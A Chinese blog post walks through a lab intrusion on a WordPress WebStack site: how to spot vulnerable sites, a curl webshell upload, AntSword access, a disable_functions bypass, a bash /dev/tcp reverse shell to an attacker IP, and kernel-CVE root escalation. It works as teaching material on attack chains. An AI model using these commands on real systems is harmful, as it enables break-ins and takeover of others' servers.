当前位置: 首页 > news >正文

网站渗透实操!从getshell到CVE提权,Linux最新内核也可提权!

前段时间Webstack写马漏洞公开

渗透思路如下:

从webstack写马→蚁剑连接→绕过disable_functions→nc反弹→exp提权

实操开始

靶场我用自建WordPress

要看一个webstack站点有没有漏洞可以访问

wp-admin/admin-ajax.php?action=img_upload路径

如果显示0如图,那十有八九就是有这个漏洞

开始写马

在当前目录下创建好木马php文件

然后运行命令上传木马

curl -F "files=@shell.php" https://目标站点/wp-admin/admin-ajax.php?action=img_upload

如图,返回上传成功和木马地址

直接访问木马地址

显示白页,说明木马正常可用

蚁剑连接

测试连接显示成功,然后直接添加

然后打开虚拟终端

发现任何命令都无法执行,原因是禁用了函数,这里需要用到蚁剑插件

绕过 disable_functions

使用蚁剑绕函数插件

靶场php版本为8.1选择对应模式,点击开始

发现命令可成功执行

接下来就直接开始反弹了

Bash反弹

蚁剑虚拟终端(靶机)运行bash -i >& /dev/tcp/攻击机IP/4444 0>&1

攻击机运行

nc -lvnp 4444

用来监听4444端口

此处需攻击机先监听端口,靶机再执行反弹命令

反弹连接成功,

执行cat /etc/os-release命令看看操作系统,发现是乌班图26系统,然后执行lsmod | grep rds命令,发现模块也开启了

刚好可以复现CVE-2026-43494

开始测试

通过蚁剑上传poc

然后运行gcc -O CVE-2026-43494.c -o exp编译poc

运行命令

file exp看看文件编译成功没

看得到exp文件是编译成功

开始提权

直接运行./exp

出现如图不报错,等待一会

直接whoami查看当前用户

显示root用户,输入id回车也是root用户

至此整场渗透结束

结束语

最后,请大家多注重网络安全,及时更新内核,补丁,防患于未然。

http://www.jsqmd.com/news/900801/

相关文章:

  • Ambari 3.0+Kafka安全认证
  • 告别3D卷积!RAFT-Stereo如何用GRU迭代优化在Middlebury拿下第一?
  • 架构师的底层重构逻辑:面部松弛、纹路加深?用3大核心参数选对高阶胶原饮
  • 语言脑机接口解码流程对比【脑机接口恢复语言2】
  • 别让天线罩毁了你的毫米波雷达!从材料选择到壁厚计算,一份给硬件工程师的避坑指南
  • 灰子学Ai: Token与字节
  • STM32L0 LPUART串口卡死?别慌,HAL库ORE溢出错误的保姆级排查与修复指南
  • 告别纸上谈兵:用Wireshark抓包实战解析5G N2/NGAP切换全流程(附pcap文件)
  • 索引设计 实操SQL + 案例 + 练习
  • k8s-Prometheus的manifests 清单部署
  • 别再乱试了!用Wireshark精准定位微信/QQ通话IP的保姆级教程(附过滤语法)
  • 研一开学别慌!用这套保姆级YOLOv5实战路线,从零到跑通代码只要三个月
  • 保姆级教程:用Grad-CAM可视化Swin Transformer,看看你的模型到底在“看”哪里
  • 手机变Linux开发机:用Termux和MT管理器打造移动端代码编辑与文件管理环境
  • .NET + 消息队列:稳稳扛住百亿流水,这才是企业级架构的真正底气
  • sd卡病毒格式化文件怎么恢复正常,只需4种方法和视频演示轻松恢复数据
  • 如何高效使用AutoDingding实现钉钉自动打卡:终极实用指南
  • S32K3xx低功耗实战:用LPUART串口唤醒Standby模式,保姆级配置流程(基于Platform SDK 2022.03)
  • 第 3 篇:把 MCP 接入 AI,以及生态里有什么
  • STM32F1用HAL库驱动42步进电机:CubeMX配置PWM定时器(TIM3)保姆级教程
  • 从野外数据到地下构造:手把手教你用地震时距曲线做一次‘虚拟勘探’
  • Cadence SPB17.4 CIS库添加新元件失败?手把手教你排查‘找不到元件’的5个常见坑
  • AI品牌命名避坑清单(含12个高危词根、6类语音陷阱、4种文化禁忌),错过本次更新将影响全球市场准入
  • AI 助手类应用通用安全漏洞:间接提示注入可窃取企业敏感数据
  • 告别65535行限制:用QGIS一键把大型SHP文件导出为Excel表格
  • RK3566开发板GT911触屏调试避坑指南:从I2C检测到DTS配置的完整流程
  • 2026年 宝钢镀锌HC550/980DPD+Z双相钢厂家/供应商推荐榜:高强度与卓越成型性能的行业优选品牌 - 品牌企业推荐师(官方)
  • C# 终于支持 union types 了
  • NestJS项目接口权限怎么管理?结合Swagger文档清晰展示JWT守卫与角色控制
  • 从普通到Low ESR:手把手教你读懂铝电解电容规格书里的‘损耗角’与ESR换算